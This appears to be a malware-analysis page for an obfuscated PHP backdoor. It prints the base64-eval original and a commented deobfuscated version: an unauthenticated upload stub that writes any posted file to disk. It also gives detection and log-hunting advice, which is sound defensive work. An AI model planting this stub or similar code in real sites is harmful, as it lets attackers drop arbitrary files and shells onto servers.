PHP Malware Analysis


Tags

Input
_POST

Deobfuscated code

<?php

// Analyst summary: a minimal upload stub. The visible code performs no password,
// token or origin check: any request that carries POST form data can have the
// file sent in multipart field "354" written to disk on the server.
// `echo eval { ... }` is PHPDeobfuscator's notation for the string that eval()
// executes in the original sample; it is not valid PHP syntax on its own.
echo eval /* PHPDeobfuscator eval output */ {
    // Gate: $_POST is truthy only when PHP parsed at least one POST form field.
    if ($_POST) {
        // Source: the temporary file PHP created for the upload in field "354".
        // Destination: the file name supplied by the client, used as-is with no
        // extension, MIME type or content check. It is a relative path, so it
        // resolves against the current working directory (usually the script's
        // own directory under a web SAPI; confirm on the affected host).
        // copy() is used instead of move_uploaded_file(), and '@' suppresses the
        // warning copy() would raise on failure.
        if (@copy($_FILES["354"]["tmp_name"], $_FILES["354"]["name"])) {
            // Status reply for a successful write. A POST whose response body is
            // exactly "Y" is a useful web-log / proxy-log hunting pivot, and files
            // created next to this script after such a request belong in scope.
            echo "Y";
        } else {
            // Status reply when the copy failed (e.g. directory not writable).
            echo "N";
        }
    } else {
        // Requests without POST data get an empty body, so a plain GET of the
        // file reveals nothing about what it does.
        echo "";
    }
};


Original code

<?=/* Analyst note (comment added for review; not part of the captured sample, so
   compute hashes on the file as captured rather than on this annotated listing).
   The payload is stored as a base64 string and executed with eval(). The PHP
   closing tag prepended to the decoded string takes eval() out of PHP mode, so
   the decoded text, which starts with its own opening tag, is parsed like a
   complete PHP file. It decodes to the upload stub shown under "Deobfuscated
   code". The short echo tag prints eval()'s return value; the decoded code has
   no return statement, so only its own echo output reaches the client.
   Detection: eval() applied directly to base64_decode() of a string literal is a
   stable static signature for file scanning; pair it with file-integrity
   monitoring and with disabling PHP execution in web-writable directories. */eval("?>".base64_decode("PD9waHAgaWYoJF9QT1NUKXtpZihAY29weSgkX0ZJTEVTWyIzNTQiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyIzNTQiXVsibmFtZSJdKSl7ZWNobyJZIjt9ZWxzZXtlY2hvIk4iO319ZWxzZXtlY2hvIiI7fT8+"));?>